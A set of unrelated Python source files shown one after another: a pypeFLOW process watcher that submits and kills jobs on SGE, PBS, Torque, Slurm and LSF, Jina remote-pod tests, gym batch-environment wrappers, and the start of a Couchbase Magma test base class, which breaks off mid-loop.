JOB_EXE='/bin/bash',
JOB_NAME=job_name,
#JOB_OPTS=JOB_OPTS,
#JOB_QUEUE=job_queue,
JOB_SCRIPT=script_fn, CMD=script_fn,
JOB_DIR=run_dir, DIR=run_dir,
JOB_STDOUT='stdout', STDOUT_FILE='stdout',
JOB_STDERR='stderr', STDERR_FILE='stderr',
#MB=pypeflow_mb,
#NPROC=pypeflow_nproc,
)
mapping.update(self.job_dict)
if 'JOB_OPTS' in mapping:
# a special two-level mapping: ${JOB_OPTS} is substituted first
mapping['JOB_OPTS'] = self.sub(mapping['JOB_OPTS'], mapping)
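# e.g. (illustrative values only) if JOB_OPTS is '-q ${JOB_QUEUE} -pe smp ${NPROC}'
# and job_dict supplies JOB_QUEUE='prod' and NPROC='4', it becomes '-q prod -pe smp 4'
# here, and only then is ${JOB_OPTS} itself expanded inside submit_template below.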
sge_cmd = self.sub(self.submit_template, mapping)
self.submit_capture = capture(sge_cmd)
def kill(self, state, heartbeat=None):
"""Can raise.
"""
#hdir = state.get_directory_heartbeats()
#heartbeat_fn = os.path.join(hdir, heartbeat)
#jobid = self.mjob.job.jobid
job_name = self.get_job_name()
job_num = self.get_job_num()
mapping = dict(
JOB_NAME=job_name,
JOB_NUM=job_num,
)
mapping.update(self.job_dict)
sge_cmd = self.sub(self.kill_template, mapping)
system(sge_cmd, checked=False)
def sub(self, unsub, mapping):
return string.Template(unsub).substitute(mapping)
def get_job_name(self):
"""Some systems are limited to 15 characters, but we expect that to be truncated by the caller.
TODO: Choose a sequential jobname and record it. Priority: low, since collisions are very unlikely.
"""
# jobid is an overloaded term in the pbsmrtpipe world, so we use job_name here.
return self.mjob.job.jobid
def get_job_num(self):
"""For now, just the jobname.
"""
return self.mjob.job.jobid
def __repr__(self):
return '{}({!r})'.format(self.__class__.__name__, self.mjob)
def __init__(self, mjob):
self.mjob = mjob
if not hasattr(self, 'JOB_OPTS'):
self.JOB_OPTS = None # unreachable, since this is an abstract class
self.job_dict = copy.deepcopy(self.mjob.job.options)
jd = self.job_dict
if 'submit' in jd:
self.submit_template = jd['submit']
if 'kill' in jd:
self.kill_template = jd['kill']
if 'JOB_OPTS' not in jd and hasattr(self, 'JOB_OPTS'):
jd['JOB_OPTS'] = self.JOB_OPTS
assert self.submit_template
assert self.kill_template
assert self.JOB_OPTS
class MetaJobSge(MetaJobSubmit):
def __init__(self, mjob):
# '-V' => pass enV; '-j y' => combine out/err
self.submit_template = 'qsub -V -N ${JOB_NAME} ${JOB_OPTS} -cwd -o ${JOB_STDOUT} -e ${JOB_STDERR} -S /bin/bash ${JOB_SCRIPT}'
self.JOB_OPTS = '-q ${JOB_QUEUE} -pe smp ${NPROC}' # -l h_vmem=${MB}M does not work within PacBio
self.kill_template = 'qdel ${JOB_NAME}'
super(MetaJobSge, self).__init__(mjob)
class MetaJobPbs(MetaJobSubmit):
"""
usage: qsub [-a date_time] [-A account_string] [-c interval]
[-C directive_prefix] [-e path] [-h ] [-I [-X]] [-j oe|eo] [-J X-Y[:Z]]
[-k o|e|oe] [-l resource_list] [-m mail_options] [-M user_list]
[-N jobname] [-o path] [-p priority] [-q queue] [-r y|n]
[-S path] [-u user_list] [-W otherattributes=value...]
[-v variable_list] [-V ] [-z] [script | -- command [arg1 ...]]
"""
def get_job_num(self):
"""Really an Id, not a number, but JOB_ID was used for something else.
See: https://github.com/PacificBiosciences/pypeFLOW/issues/54
"""
cap = self.submit_capture
try:
re_cap = re.compile(r'\S+')
mo = re_cap.search(cap)
return mo.group(0)
except Exception:
log.exception('For PBS, failed to parse submit_capture={!r}\n Using job_name instead.'.format(cap))
return self.mjob.job.jobid
def __init__(self, mjob):
self.submit_template = 'qsub -V -N ${JOB_NAME} ${JOB_OPTS} -o ${JOB_STDOUT} -e ${JOB_STDERR} -S /bin/bash ${JOB_SCRIPT}'
self.JOB_OPTS = '-q ${JOB_QUEUE} --cpus-per-task=${NPROC} --mem-per-cpu=${MB}M'
self.kill_template = 'qdel ${JOB_NAME}'
super(MetaJobPbs, self).__init__(mjob)
class MetaJobTorque(MetaJobSubmit):
# http://docs.adaptivecomputing.com/torque/4-0-2/help.htm#topics/commands/qsub.htm
def __init__(self, mjob):
self.submit_template = 'qsub -V -N ${JOB_NAME} ${JOB_OPTS} -d ${JOB_DIR} -o ${JOB_STDOUT} -e ${JOB_STDERR} -S /bin/bash ${JOB_SCRIPT}'
self.JOB_OPTS = '-q ${JOB_QUEUE} -l procs=${NPROC}'
self.kill_template = 'qdel ${JOB_NUM}'
super(MetaJobTorque, self).__init__(mjob)
class MetaJobSlurm(MetaJobSubmit):
def __init__(self, mjob):
self.submit_template = 'sbatch -J ${JOB_NAME} ${JOB_OPTS} -D ${JOB_DIR} -o ${JOB_STDOUT} -e ${JOB_STDERR} --wrap="/bin/bash ${JOB_SCRIPT}"'
self.JOB_OPTS = '-p ${JOB_QUEUE} --mincpus=${NPROC} --mem-per-cpu=${MB}'
self.kill_template = 'scancel -n ${JOB_NUM}'
super(MetaJobSlurm, self).__init__(mjob)
class MetaJobLsf(MetaJobSubmit):
def __init__(self, mjob):
self.submit_template = 'bsub -J ${JOB_NAME} ${JOB_OPTS} -o ${JOB_STDOUT} -e ${JOB_STDERR} "/bin/bash ${JOB_SCRIPT}"'
# "Sets the user's execution environment for the job, including the current working directory, file creation mask, and all environment variables, and sets LSF environment variables before starting the job."
self.JOB_OPTS = '-q ${JOB_QUEUE} -n ${NPROC}'
self.kill_template = 'bkill -J ${JOB_NUM}'
super(MetaJobLsf, self).__init__(mjob)
def link_rundir(state_rundir, user_rundir):
if user_rundir:
link_fn = os.path.join(user_rundir, 'pwatcher.dir')
if os.path.lexists(link_fn):
os.unlink(link_fn)
os.symlink(os.path.abspath(state_rundir), link_fn)
def cmd_run(state, jobids, job_type, job_defaults_dict):
"""On stdin, each line is a unique job-id, followed by run-dir, followed by command+args.
Wrap them and run them locally, in the background.
"""
# We don't really need job_defaults_dict as they were already
# added to job_dict for each job.
jobs = dict()
submitted = list()
result = {'submitted': submitted}
for jobid, desc in jobids.iteritems():
options = copy.deepcopy(desc['job_dict']) # defaults were already applied here
if not options.get('job_type'):
options['job_type'] = job_type
if int(desc['job_local']):
options['job_type'] = 'local'
jobs[jobid] = Job(jobid, desc['cmd'], desc['rundir'], options)
log.debug('jobs:\n{}'.format(pprint.pformat(jobs)))
for jobid, job in jobs.iteritems():
desc = jobids[jobid]
mjob = Job_get_MetaJob(job)
MetaJob_wrap(mjob, state)
options = job.options
my_job_type = job.options['job_type']
if my_job_type is None:
my_job_type = job_type
my_job_type = my_job_type.upper()
log.info(' starting job {} w/ job_type={}'.format(pprint.pformat(job), my_job_type))
if my_job_type == 'LOCAL':
bjob = MetaJobLocal(mjob)
elif my_job_type == 'SGE':
bjob = MetaJobSge(mjob)
elif my_job_type == 'PBS':
bjob = MetaJobPbs(mjob)
elif my_job_type == 'TORQUE':
bjob = MetaJobTorque(mjob)
elif my_job_type == 'SLURM':
bjob = MetaJobSlurm(mjob)
elif my_job_type == 'LSF':
bjob = MetaJobLsf(mjob)
else:
raise Exception('Unknown my_job_type=%s' %repr(my_job_type))
try:
link_rundir(state.get_directory_job(jobid), desc.get('rundir'))
state.submit_background(bjob)
submitted.append(jobid)
except Exception:
log.exception('In pwatcher.fs_based.cmd_run(), failed to submit background-job:\n{!r}'.format(
bjob))
#raise
return result
# The caller is responsible for deciding what to do about job-submission failures. Re-try, maybe?
re_heartbeat = re.compile(r'heartbeat-(.+)')
def get_jobid_for_heartbeat(heartbeat):
"""This cannot fail unless we change the filename format.
"""
mo = re_heartbeat.search(heartbeat)
jobid = mo.group(1)
return jobid
def system(call, checked=False):
log.info('CALL:\n {}'.format(call))
rc = os.system(call)
if checked and rc:
raise Exception('{} <- {!r}'.format(rc, call))
_warned = dict()
def warnonce(hashkey, msg):
if hashkey in _warned:
return
log.warning(msg)
_warned[hashkey] = True
def get_status(state, elistdir, reference_s, sentinel, heartbeat):
heartbeat_path = os.path.join(state.get_directory_heartbeats(), heartbeat)
# We take listdir so we can avoid extra system calls.
if sentinel in elistdir:
try:
pass
#os.remove(heartbeat_path) # Note: We no longer use the heartbeats.
except Exception:
log.debug('Unable to remove heartbeat {} when sentinel was found in exit-sentinels listdir.\n{}'.format(
repr(heartbeat_path), traceback.format_exc()))
sentinel_path = os.path.join(state.get_directory_exits(), sentinel)
with open(sentinel_path) as ifs:
rc = ifs.read().strip()
return 'EXIT {}'.format(rc)
## TODO: Record last stat times, to avoid extra stat if too frequent.
#try:
# mtime_s = os.path.getmtime(heartbeat_path)
# if (mtime_s + 3*HEARTBEAT_RATE_S) < reference_s:
# if (ALLOWED_SKEW_S + mtime_s + 3*HEARTBEAT_RATE_S) < reference_s:
# msg = 'DEAD job? {} + 3*{} + {} < {} for {!r}'.format(
# mtime_s, HEARTBEAT_RATE_S, ALLOWED_SKEW_S, reference_s, heartbeat_path)
# log.debug(msg)
# warnonce(heartbeat_path, msg)
# return 'DEAD'
# else:
# log.debug('{} + 3*{} < {} for {!r}. You might have a large clock-skew, or filesystem delays, or just filesystem time-rounding.'.format(
# mtime_s, HEARTBEAT_RATE_S, reference_s, heartbeat_path))
#except Exception as exc:
# # Probably, somebody deleted it after our call to os.listdir().
# # TODO: Decide what this really means.
# log.debug('Heartbeat not (yet?) found at %r: %r' %(heartbeat_path, exc))
# return 'UNKNOWN'
return 'RUNNING' # but actually it might not have started yet, or it could be dead, since we are not checking the heartbeat
def cmd_query(state, which, jobids):
"""Return the state of named jobids.
See find_jobids().
"""
found = dict()
edir = state.get_directory_exits()
for heartbeat in find_heartbeats(state, which, jobids):
jobid = get_jobid_for_heartbeat(heartbeat)
mji = state.get_mji(jobid)
sentinel = mji.get_sentinel()
#system('ls -l {}/{} {}/{}'.format(edir, sentinel, hdir, heartbeat), checked=False)
found[jobid] = (sentinel, heartbeat)
elistdir = os.listdir(edir)
current_time_s = time.time()
result = dict()
jobstats = dict()
result['jobids'] = jobstats
for jobid, pair in found.iteritems():
sentinel, heartbeat = pair
status = get_status(state, elistdir, current_time_s, sentinel, heartbeat)
log.debug('Status %s for heartbeat:%s' %(status, heartbeat))
jobstats[jobid] = status
return result
def get_jobid2pid(pid2mjob):
result = dict()
for pid, mjob in pid2mjob.iteritems():
jobid = mjob.job.jobid
result[jobid] = pid
return result
def find_heartbeats(state, which, jobids):
"""Yield heartbeat filenames.
If which=='list', then query jobs listed as jobids.
If which=='known', then query all known jobs.
If which=='infer', then query all jobs with heartbeats.
These are not quite finished, but already useful.
"""
#log.debug('find_heartbeats for which=%s, jobids=%s' %(which, pprint.pformat(jobids)))
if which == 'infer':
for fn in glob.glob(os.path.join(state.get_directory_heartbeats(), 'heartbeat*')):
yield fn
elif which == 'known':
jobid2mjob = state.get_mjobs()
for jobid, mjob in jobid2mjob.iteritems():
mji = MetaJobClass(mjob)
yield mji.get_heartbeat()
elif which == 'list':
jobid2mjob = state.get_mjobs()
#log.debug('jobid2mjob:\n%s' %pprint.pformat(jobid2mjob))
for jobid in jobids:
#log.debug('jobid=%s; jobids=%s' %(repr(jobid), repr(jobids)))
#if jobid not in jobid2mjob:
# log.info("jobid=%s is not known. Might have been deleted already." %jobid)
mjob = jobid2mjob[jobid]
mji = MetaJobClass(mjob)
yield mji.get_heartbeat()
else:
raise Exception('which=%s'%repr(which))
def delete_heartbeat(state, heartbeat, keep=False):
"""
Kill the job with this heartbeat.
(If there is no heartbeat, then the job is already gone.)
Delete the entry from state and update its jobid.
Remove the heartbeat file, unless 'keep'.
"""
hdir = state.get_directory_heartbeats()
heartbeat_fn = os.path.join(hdir, heartbeat)
jobid = get_jobid_for_heartbeat(heartbeat)
try:
bjob = state.get_bjob(jobid)
except Exception:
log.exception('In delete_heartbeat(), unable to find batchjob for %s (from %s)' %(jobid, heartbeat))
log.warning('Cannot delete. You might be able to delete this yourself if you examine the content of %s.' %heartbeat_fn)
# TODO: Maybe provide a default grid type, so we can attempt to delete anyway?
return
try:
bjob.kill(state, heartbeat)
except Exception as exc:
log.exception('Failed to kill job for heartbeat {!r} (which might mean it was already gone): {!r}'.format(
heartbeat, exc))
state.add_deleted_jobid(jobid)
# For now, keep it in the 'jobs' table.
try:
os.remove(heartbeat_fn)
log.debug('Removed heartbeat=%s' %repr(heartbeat))
except OSError as exc:
log.debug('Cannot remove heartbeat {!r}: {!r}'.format(heartbeat_fn, exc))
# Note: If sentinel suddenly appeared, that means the job exited. The pwatcher might wrongly think
# it was deleted, but its output might be available anyway.
def cmd_delete(state, which, jobids):
"""Kill designated jobs, including (hopefully) their
entire process groups.
If which=='list', then kill all jobs listed as jobids.
If which=='known', then kill all known jobs.
If which=='infer', then kill all jobs with heartbeats.
Remove those heartbeat files.
"""
log.debug('Deleting jobs for jobids from %s (%s)' %(
which, repr(jobids)))
for heartbeat in find_heartbeats(state, which, jobids):
delete_heartbeat(state, heartbeat)
def makedirs(path):
if not os.path.isdir(path):
os.makedirs(path)
def readjson(ifs):
"""Del keys that start with ~.
That lets us have trailing commas on all other lines.
"""
content = ifs.read()
log.debug('content:%s' %repr(content))
jsonval = json.loads(content)
#pprint.pprint(jsonval)
def striptildes(subd):
if not isinstance(subd, dict):
return
for k,v in subd.items():
if k.startswith('~'):
del subd[k]
else:
striptildes(v)
striptildes(jsonval)
#pprint.pprint(jsonval)
return jsonval
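# For example (hypothetical hand-written input), readjson would turn
#   {"jobids": {"task-0001": {"cmd": "bash run.sh"}, "~": 0}}
# into {"jobids": {"task-0001": {"cmd": "bash run.sh"}}}, because every key that
# starts with '~' is dropped recursively; that is what allows a trailing comma
# (followed by a dummy "~..." entry) on every real line of the JSON.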
class ProcessWatcher(object):
def run(self, jobids, job_type, job_defaults_dict):
#import traceback; log.debug(''.join(traceback.format_stack()))
log.debug('run(jobids={}, job_type={}, job_defaults_dict={})'.format(
'<%s>'%len(jobids), job_type, job_defaults_dict))
return cmd_run(self.state, jobids, job_type, job_defaults_dict)
def query(self, which='list', jobids=[]):
log.debug('query(which={!r}, jobids={})'.format(
which, '<%s>'%len(jobids)))
return cmd_query(self.state, which, jobids)
def delete(self, which='list', jobids=[]):
log.debug('delete(which={!r}, jobids={})'.format(
which, '<%s>'%len(jobids)))
return cmd_delete(self.state, which, jobids)
def __init__(self, state):
self.state = state
def get_process_watcher(directory):
state = get_state(directory)
#log.debug('state =\n%s' %pprint.pformat(state.top))
return ProcessWatcher(state)
#State_save(state)
@contextlib.contextmanager
def process_watcher(directory):
"""This will (someday) hold a lock, so that
the State can be written safely at the end.
"""
state = get_state(directory)
#log.debug('state =\n%s' %pprint.pformat(state.top))
yield ProcessWatcher(state)
# TODO: Sometimes, maybe we should not save state.
# Or maybe we *should* on exception.
State_save(state)
def main(prog, cmd, state_dir='mainpwatcher', argsfile=None):
logging.basicConfig()
logging.getLogger().setLevel(logging.NOTSET)
log.warning('logging basically configured')
log.debug('debug mode on')
assert cmd in ['run', 'query', 'delete']
ifs = sys.stdin if not argsfile else open(argsfile)
argsdict = readjson(ifs)
log.info('argsdict =\n%s' %pprint.pformat(argsdict))
with process_watcher(state_dir) as watcher:
result = getattr(watcher, cmd)(**argsdict)
if result is not None:
print(pprint.pformat(result))
# With bash, we would need to set the session, rather than
# the process group. That's not ideal, but this is here for reference.
# http://stackoverflow.com/questions/6549663/how-to-set-process-group-of-a-shell-script
#
bash_template = """#!%(lang_exe)s
cmd='%(cmd)s'
"$cmd"
"""
# perl might be better, for efficiency.
# But we will use python for now.
#
python_template = r"""#!%(lang_exe)s
import threading, time, os, sys
cmd='%(cmd)s'
sentinel_fn='%(sentinel_fn)s'
heartbeat_fn='%(heartbeat_fn)s'
sleep_s=%(sleep_s)s
cwd='%(cwd)s'
os.chdir(cwd)
def log(msg):
sys.stderr.write(msg)
sys.stderr.write('\n')
#sys.stdout.flush()
def thread_heartbeat():
ofs = open(heartbeat_fn, 'w')
pid = os.getpid()
pgid = os.getpgid(0)
x = 0
while True:
ofs.write('{} {} {}\n'.format(x, pid, pgid))
ofs.flush()
time.sleep(sleep_s)
x += 1
def start_heartbeat():
hb = threading.Thread(target=thread_heartbeat)
log('alive? {}'.format(hb.is_alive()))
hb.daemon = True
hb.start()
return hb
def main():
log('cwd:{!r}'.format(os.getcwd()))
if os.path.exists(sentinel_fn):
os.remove(sentinel_fn)
if os.path.exists(heartbeat_fn):
os.remove(heartbeat_fn)
os.system('touch {}'.format(heartbeat_fn))
log("before: pid={}s pgid={}s".format(os.getpid(), os.getpgid(0)))
try:
os.setpgid(0, 0)
except OSError as e:
log('Unable to set pgid. Possibly a grid job? Hopefully there will be no dangling processes when killed: {}'.format(
repr(e)))
log("after: pid={}s pgid={}s".format(os.getpid(), os.getpgid(0)))
hb = start_heartbeat()
log('alive? {} pid={} pgid={}'.format(hb.is_alive(), os.getpid(), os.getpgid(0)))
rc = os.system(cmd)
# Do not delete the heartbeat here. The discoverer of the sentinel will do that,
# to avoid a race condition.
#if os.path.exists(heartbeat_fn):
# os.remove(heartbeat_fn)
with open(sentinel_fn, 'w') as ofs:
ofs.write(str(rc))
# sys.exit(rc) # No-one would see this anyway.
if rc:
raise Exception('{} <- {!r}'.format(rc, cmd))
main()
"""
if __name__ == "__main__":
import pdb
pdb.set_trace()
main(*sys.argv) # pylint: disable=no-value-for-parameter
|
test_remote2.py
|
import os
import threading
import time
import unittest
from multiprocessing import Process
from jina.logging import get_logger
from jina.main.parser import set_gateway_parser, set_pea_parser, set_pod_parser
from jina.peapods.pod import GatewayPod, BasePod
from jina.peapods.remote import RemotePea, PodSpawnHelper, PeaSpawnHelper, MutablePodSpawnHelper, RemotePod, \
RemoteMutablePod
from tests import JinaTestCase
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
class MyTestCase(JinaTestCase):
def test_logging_thread(self):
_event = threading.Event()
logger = get_logger('mytest', event_trigger=_event)
def _print_messages():
while True:
_event.wait()
print(f'thread: {_event.record}')
print(type(_event.record))
_event.clear()
t = threading.Thread(target=_print_messages)
t.daemon = True
t.start()
logger.info('blah, blah')
logger.info('blah, blah, blah')
time.sleep(.1)
logger.warning('warn, warn, warn')
time.sleep(.1)
logger.debug('warn, warn, warn')
time.sleep(.1)
logger.success('crit')
time.sleep(.1)
def test_remote_pod(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3',
'--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
PodSpawnHelper(p_args).start()
t.join()
def test_remote_pod_process(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3',
'--port-grpc', str(f_args.port_grpc), '--runtime', 'process'])
def start_spawn():
PodSpawnHelper(p_args).start()
with GatewayPod(f_args):
t = Process(target=start_spawn)
t.daemon = True
t.start()
time.sleep(5)
def test_remote_two_pea(self):
# NOTE: right now there is no way to spawn two peas with one gateway!!!
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
def start_client(d):
print('im running %d' % d)
p_args = set_pea_parser().parse_args(
['--host', 'localhost', '--name', 'testpea%d' % d, '--port-grpc', str(f_args.port_grpc)])
PeaSpawnHelper(p_args).start()
t = Process(target=start_gateway)
t.daemon = True
t.start()
time.sleep(1)
c1 = Process(target=start_client, args=(1,))
c2 = Process(target=start_client, args=(2,))
c1.daemon = True
c2.daemon = True
c1.start()
c2.start()
time.sleep(5)
c1.join()
c2.join()
def tearDown(self) -> None:
time.sleep(2)
super().tearDown()
def test_customized_pod(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3', '--port-grpc', str(f_args.port_grpc)])
p = BasePod(p_args)
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
MutablePodSpawnHelper(p.peas_args).start()
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
def test_customized_pod2(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3', '--port-grpc', str(f_args.port_grpc)])
p = BasePod(p_args)
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
with RemoteMutablePod(p.peas_args):
pass
t.join()
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
def test_remote_pea2(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
with RemotePea(p_args):
pass
t.join()
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
def test_remote_pod2(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
with RemotePod(p_args):
pass
t.join()
def test_remote_pea(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
time.sleep(1)
PeaSpawnHelper(p_args).start()
t.join()
if __name__ == '__main__':
unittest.main()
|
util_envs.py
|
import numpy as np
import multiprocessing as mp
import gym
def _child(id, pipe):
"""
Event loop run by the child processes
"""
env = gym.make(id)
try:
while True:
command = pipe.recv()
# command is a tuple like ("call" | "get", "name.of.attr", extra args...)
obj = env
attrs = command[1].split(".")
for attr in attrs[:-1]:
obj = getattr(obj, attr)
if command[0] == "call":
fct = getattr(obj, attrs[-1])
result = fct(*command[2])
elif command[0] == "get":
result = getattr(obj, attrs[-1])
elif command[0] == "hasattr":
result = hasattr(obj, attrs[-1])
pipe.send(result)
finally:
pipe.close()
class _ChildEnv:
"""
Wrapper for an env in a child process.
"""
def __init__(self, id):
self._pipe, child_pipe = mp.Pipe()
self._process = mp.Process(target=_child, args=(id, child_pipe))
self._process.start()
def call(self, method, *args):
self._pipe.send(("call", method, args))
def get(self, attr):
self._pipe.send(("get", attr))
def hasattr(self, attr):
self._pipe.send(("hasattr", attr))
def result(self):
return self._pipe.recv()
def call_sync(self, *args):
self.call(*args)
return self.result()
def get_sync(self, *args):
self.get(*args)
return self.result()
def hasattr_sync(self, *args):
self.hasattr(*args)
return self.result()
def close(self):
self._pipe.close()
self._process.join()
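# A small illustrative sketch (the env id is just an example) of the protocol above:
# requests can be queued asynchronously and collected later, or the *_sync helpers
# can be used for one-shot round trips.
#
#   env = _ChildEnv("CartPole-v0")        # assumes this gym id is registered
#   env.call("reset")                     # non-blocking: request goes down the pipe
#   first_obs = env.result()              # blocking: read the child's reply
#   action_space = env.get_sync("action_space")
#   env.close()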
class ParallelBatchEnv(gym.Env):
""" Environment to run multiple games in parallel.
"""
def __init__(self, env_id, batch_size):
"""
Parameters
----------
env_id : list of str or str
Environment IDs that will compose a batch. If only
one env_id is provided, it will be repeated `batch_size` times.
batch_size : int
Number of environment to run in parallel.
"""
self.env_ids = env_id if type(env_id) is list else [env_id] * batch_size
self.batch_size = batch_size
assert len(self.env_ids) == self.batch_size
self.envs = []
for id in self.env_ids:
self.envs.append(_ChildEnv(id))
self.observation_space = self.envs[0].get_sync("observation_space")
self.action_space = self.envs[0].get_sync("action_space")
def skip(self, ngames=1):
for env in self.envs:
env.call_sync("unwrapped.skip", ngames)
def seed(self, seed=None):
# Use different seed for each env to decorrelate
# the examples in the batch.
rng = np.random.RandomState(seed)
seeds = list(rng.randint(65535, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.call_sync("seed", seed)
return seeds
def reset(self):
self.last = [None] * self.batch_size
obs, infos = [], []
for env in self.envs:
env.call("reset")
for env in self.envs:
result = env.result()
ob, info = result
obs.append(ob)
infos.append(info)
return obs, infos
def step(self, actions):
results = []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game is done
results.append(self.last[i]) # Copy last infos over.
else:
env.call("step", action)
results.append(None)
obs, rewards, dones, infos = [], [], [], []
for i, (env, result) in enumerate(zip(self.envs, results)):
if result is None:
result = env.result()
ob, reward, done, info = result
obs.append(ob)
rewards.append(reward)
dones.append(done)
infos.append(info)
self.last[i] = result
return obs, rewards, dones, infos
def render(self, mode='human'):
for env in self.envs:
env.call("render", mode)
renderings = []
for env in self.envs:
renderings.append(env.result())
return renderings
def close(self):
for env in self.envs:
env.close()
class BatchEnv(gym.Env):
""" Environment to run multiple games independently.
"""
def __init__(self, env_id, batch_size):
"""
Parameters
----------
env_id : list of str or str
Environment IDs that will compose a batch. If only
one env_id is provided, it will be repeated `batch_size` times.
batch_size : int
Number of independent environments to run.
"""
self.env_ids = env_id if type(env_id) is list else [env_id] * batch_size
self.batch_size = batch_size
assert len(self.env_ids) == self.batch_size
self.envs = [gym.make(self.env_ids[i]) for i in range(self.batch_size)]
self.observation_space = self.envs[0].observation_space
self.action_space = self.envs[0].action_space
def skip(self, ngames=1):
for env in self.envs:
env.env.skip(ngames)
def seed(self, seed=None):
# Use different seed for each env to decorrelate
# the examples in the batch.
rng = np.random.RandomState(seed)
        seeds = list(rng.randint(65535, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.seed(seed)
return seeds
def reset(self):
self.last = [None] * self.batch_size
obs, infos = [], []
for env in self.envs:
ob, info = env.reset()
obs.append(ob)
infos.append(info)
return obs, infos
def step(self, actions):
obs, rewards, dones, infos = [], [], [], []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game is done
ob, reward, done, info = self.last[i] # Copy last infos over.
else:
ob, reward, done, info = env.step(action)
obs.append(ob)
rewards.append(reward)
dones.append(done)
infos.append(info)
self.last[i] = ob, reward, done, info
return obs, rewards, dones, infos
def render(self, mode='human'):
renderings = []
for env in self.envs:
rendering = env.render(mode=mode)
renderings.append(rendering)
return renderings
def close(self):
for env in self.envs:
env.close()
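# --- Hedged usage sketch (not part of the original module) ---
# Shows the reset()/step() loop shared by ParallelBatchEnv and BatchEnv. The
# env id, batch size and episode length are placeholders; the wrapped
# environment is assumed to follow the API these classes expect, i.e. reset()
# returning (ob, info) and step() returning (ob, reward, done, info).
def _example_batch_rollout(env_id="SomeEnv-v0", batch_size=4, max_steps=10,
                           parallel=True):
    env_cls = ParallelBatchEnv if parallel else BatchEnv
    batch_env = env_cls(env_id, batch_size)
    batch_env.seed(42)                     # decorrelated per-env seeds
    obs, infos = batch_env.reset()         # one (ob, info) pair per env
    rewards = [0] * batch_size
    for _ in range(max_steps):
        # sample one action per environment from the shared action space
        actions = [batch_env.action_space.sample() for _ in range(batch_size)]
        obs, rewards, dones, infos = batch_env.step(actions)
        if all(dones):                     # finished games keep their last result
            break
    batch_env.close()
    return rewards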
|
magma_base.py
|
import math
import os
import random
import time
import threading
from Cb_constants.CBServer import CbServer
from cb_tools.cbstats import Cbstats
from remote.remote_util import RemoteMachineShellConnection
from storage.storage_base import StorageBase
from storage_utils.magma_utils import MagmaUtils
class MagmaBaseTest(StorageBase):
def setUp(self):
super(MagmaBaseTest, self).setUp()
# Update Magma/Storage Properties
props = "magma"
update_bucket_props = False
self.disable_magma_commit_points = self.input.param(
"disable_magma_commit_points", False)
self.max_commit_points = self.input.param("max_commit_points", None)
if self.disable_magma_commit_points:
self.max_commit_points = 0
if self.max_commit_points is not None:
props += ";magma_max_checkpoints={}".format(self.max_commit_points)
self.log.debug("props== {}".format(props))
update_bucket_props = True
if update_bucket_props:
self.bucket_util.update_bucket_props(
"backend", props,
self.cluster, self.cluster.buckets)
self.magma_utils = MagmaUtils()
# Monitor Stats Params
self.ep_queue_stats = self.input.param("ep_queue_stats", True)
self.monitor_stats = ["doc_ops", "ep_queue_size"]
if not self.ep_queue_stats:
self.monitor_stats = ["doc_ops"]
# Disk usage before data load
self.empty_bucket_disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)[0]
self.log.info("Empty magma bucket disk usage: {}".format(
self.empty_bucket_disk_usage))
        # self.read_thread_count defines the number of threads used
        # to read the same set of documents in parallel
self.read_thread_count = self.input.param("read_thread_count", 4)
self.disk_usage = dict()
# Creating clients in SDK client pool
self.sdk_timeout = self.input.param("sdk_timeout", 60)
self.init_sdk_pool_object()
self.log.info("Creating SDK clients for client_pool")
max_clients = min(self.task_manager.number_of_threads, 20)
clients_per_bucket = int(math.ceil(max_clients / self.standard_buckets))
for bucket in self.cluster.buckets:
self.sdk_client_pool.create_clients(
bucket, [self.cluster.master],
clients_per_bucket,
compression_settings=self.sdk_compression)
# Initial Data Load
self.loader_dict = None
self.init_loading = self.input.param("init_loading", True)
if self.init_loading:
if self.active_resident_threshold < 100:
self.check_temporary_failure_exception = True
self.create_start = 0
self.create_end = self.init_items_per_collection
self.generate_docs(doc_ops="create")
self.load_buckets_in_dgm(self.gen_create, "create", 0)
else:
self.initial_load()
self.dgm_prcnt = self.get_bucket_dgm(self.buckets[0])
self.log.info("DGM percentage after init loading is {}".format(self.dgm_prcnt))
if self.standard_buckets == 1 or self.standard_buckets == self.magma_buckets:
for bucket in self.bucket_util.get_all_buckets(self.cluster):
